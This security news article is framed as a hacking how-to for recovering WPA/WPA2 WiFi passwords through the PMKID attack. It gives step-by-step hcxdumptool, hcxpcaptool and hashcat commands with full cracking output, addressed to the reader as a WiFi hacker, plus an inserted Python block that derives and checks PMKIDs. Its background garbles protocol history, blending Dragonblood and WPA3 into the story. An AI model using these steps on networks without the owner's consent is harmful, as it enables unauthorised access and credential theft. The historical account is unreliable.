How to Hack WPA/WPA2 PSK Enabled WiFi Password in Your Network

A new attack method has been discovered that lets an attacker obtain the Pre-Shared Key hash of a WPA/WPA2-secured WiFi network; that hash can then be cracked offline to recover the WiFi password used by targeted victims.

The WiFi Alliance recently released the updated protocol WPA3 and claimed that it is impossible to crack since it deploys a high-level encryption protocol.

But researchers proved this wrong by exploiting a vulnerability in it, which they named Dragonblood.

What is WPA?

Wi-Fi Protected Access (WPA) has been available since 2003; later, security researchers found a severe vulnerability in WPA that let WiFi hackers easily exploit it and take over the WiFi network.

The WiFi Alliance later fixed the vulnerability and released WPA2 in 2004. WPA2 is a common shorthand for the full IEEE 802.11i standard, and certification from the WiFi Alliance is required to protect the network from WiFi hackers.

Very recently, WPA3 was announced by the Wi-Fi Alliance as a replacement for WPA2 after researchers found a critical vulnerability in WPA2 that allows WiFi hackers to take over the vulnerable network.

This new WiFi hacking method was discovered during an attack against the recently released WPA3 security standard, which is exceedingly harder to crack since it uses Simultaneous Authentication of Equals (SAE), a new key establishment protocol.

The new WPA3 security standard released by the Wi-Fi Alliance provides next-generation Wi-Fi security with new capabilities that enhance both personal and enterprise networks; WPA3 is the successor of WPA2.

The researcher found that this attack lets a WiFi hacker compromise the WPA/WPA2 password without capturing the EAPOL 4-way handshake.

According to Steube, the developer of the Hashcat password cracking tool, the new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

This attack also works against all types of 802.11i/p/q/r networks with roaming functions enabled, and it is unclear how many vendors and how many routers this technique will work against.

How Does this WPA/WPA2 Attack Work, and What is the WiFi Hacking Process?

The Robust Security Network Information Element (RSN IE) is an optional element in 802.11 management frames, and this attack works on a single EAPOL frame.

The Pairwise Master Key ID (PMKID) can be captured from the RSN IE whenever a user tries to authenticate with the router.

“Here we can see that the PMKID that has been captured is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address.”

In order to make use of this new attack, as a WiFi hacker, you need the following tools:

  • hcxdumptool v4.2.0 or higher
  • hcxtools v4.2.0 or higher
  • hashcat v4.2.0 or higher

WiFi Hacker – Step 1

First, run hcxdumptool to obtain the PMKID from the AP and dump the capture in PCAPNG format using the following command.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

The output looks like this:

start capturing (stop with ctrl+c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

WiFi Hacker – Step 2

Next, run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat using the following command.

$ ./hcxpcaptool -z test.16800 test.pcapng

The content of the written file will look like this; it is split into four columns separated by an asterisk.

PMKID * MAC AP * MAC Station * ESSID

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

The researcher also recommends that, while not required, WiFi hackers use the options -E, -I and -U with hcxpcaptool. The resulting files can be fed to hashcat and typically produce good results.

  • -E retrieve possible passwords from WiFi traffic (additionally, this list will include ESSIDs)
  • -I retrieve identities from WiFi traffic
  • -U retrieve usernames from WiFi traffic

$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

WiFi Hacker – Step 3

Finally, run hashcat to crack the hash. We need to use the PMKID hash mode, -m 16800, and can then treat this hash like any other hash type, using the following command:

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Finally, it cracked the hash (hash type WPA-PMKID-PBKDF2):

hashcat (v4.2.0) starting…

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session……….: hashcat
Status………..: Cracked
Hash.Type……..: WPA-PMKID-PBKDF2
Hash.Target……: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf…a39f3a
Time.Started…..: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated…: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask…….: ?l?l?l?l?l?lt! [8]
Guess.Queue……: 1/1 (100.00%)
Speed.Dev.#1…..:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2…..:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3…..:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4…..:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*…..:  1641.3 kH/s
Recovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress………: 66846720/308915776 (21.64%)
Rejected………: 0/66846720 (0.00%)
Restore.Point….: 0/11881376 (0.00%)
Candidates.#1….: hariert! -> hhzkzet!
Candidates.#2….: hdtivst! -> hzxkbnt!
Candidates.#3….: gnxpwet! -> gwqivst!
Candidates.#4….: gxhcddt! -> grjmrut!
HWMon.Dev.#1…..: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2…..: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3…..: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4…..: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

With previously available WiFi hacking attacks, we had to sit back and wait until the target user logged in; only then could we capture the four-way handshake and crack the key.

To get access to the PMKID, this new attack only has to attempt to authenticate to the wireless network; afterwards the hash can be cracked to recover the WiFi password, i.e. the crucial pre-shared key, on behalf of the WiFi hacker.

This method also makes it much easier to obtain the hash that contains the pre-shared key, which is then cracked later; how hard that cracking step is depends on the complexity of the password.
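As an added example (not code from the article, the researcher, or the hashcat project), the following Python reproduces the PMKID derivation quoted above and parses the 16800 hash line from Step 2, so a network owner can confirm that a captured line belongs to their SSID and see that the passphrase is the only secret input; mask_keyspace reproduces the 308915776-candidate total hashcat printed in Step 3, which at the reported 1641.3 kH/s is exhausted in about three minutes. CAPTURED_LINE is the article's own example line; the MASK_CLASSES sizes are hashcat's built-in charsets.

```python
import hashlib
import hmac

# Hash line in hashcat's 16800 format, copied from the article's worked example:
# PMKID * AP MAC * station MAC * ESSID (hex-encoded)
CAPTURED_LINE = ("2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*"
                 "ed487162465a774bfba60eb603a39f3a")

# Per-character set sizes of the hashcat mask classes (?l ?u ?d ?s).
MASK_CLASSES = {"l": 26, "u": 26, "d": 10, "s": 33}

def parse_16800(line):
    """Split a -m 16800 line into its four fields; MACs and ESSID become bytes."""
    pmkid, ap_mac, sta_mac, essid_hex = line.strip().split("*")
    if len(pmkid) != 32 or len(ap_mac) != 12 or len(sta_mac) != 12:
        raise ValueError("malformed 16800 line")
    return {"pmkid": pmkid.lower(), "ap_mac": bytes.fromhex(ap_mac),
            "sta_mac": bytes.fromhex(sta_mac), "essid": bytes.fromhex(essid_hex)}

def derive_pmk(passphrase, essid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the only salt, so the passphrase is the sole secret input."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)

def derive_pmkid(pmk, ap_mac, sta_mac):
    """PMKID = Truncate-128(HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC)).
    Both MAC addresses are sent in the clear, which is why one RSN IE suffices."""
    mac = hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1)
    return mac.digest()[:16].hex()

def pmkid_matches(line, passphrase):
    """Owner's check: does this passphrase reproduce the PMKID in the capture?"""
    f = parse_16800(line)
    pmk = derive_pmk(passphrase, f["essid"])
    return derive_pmkid(pmk, f["ap_mac"], f["sta_mac"]) == f["pmkid"]

def mask_keyspace(mask):
    """Number of candidates a hashcat mask enumerates (?l/?u/?d/?s or literal chars)."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            total *= MASK_CLASSES[mask[i + 1]]
            i += 2
        else:
            i += 1
    return total
```

Dividing mask_keyspace("?l?l?l?l?l?lt!") by the 1641300 hashes per second shown in the hashcat output gives the roughly 188 seconds a worst-case run of that mask would take on four GPUs; a long random passphrase is the only thing that makes this offline step impractical.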

Conclusion

Recently the WiFi Alliance released a highly secured protocol, WPA3, for WiFi networks, but WPA3 was hacked again by a team of security researchers due to a security flaw in the protocol. Using the above method, WiFi hackers can now hack the WiFi password.

This article is completely for educational purposes, please do not attempt to test any WiFi network without permission.

Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
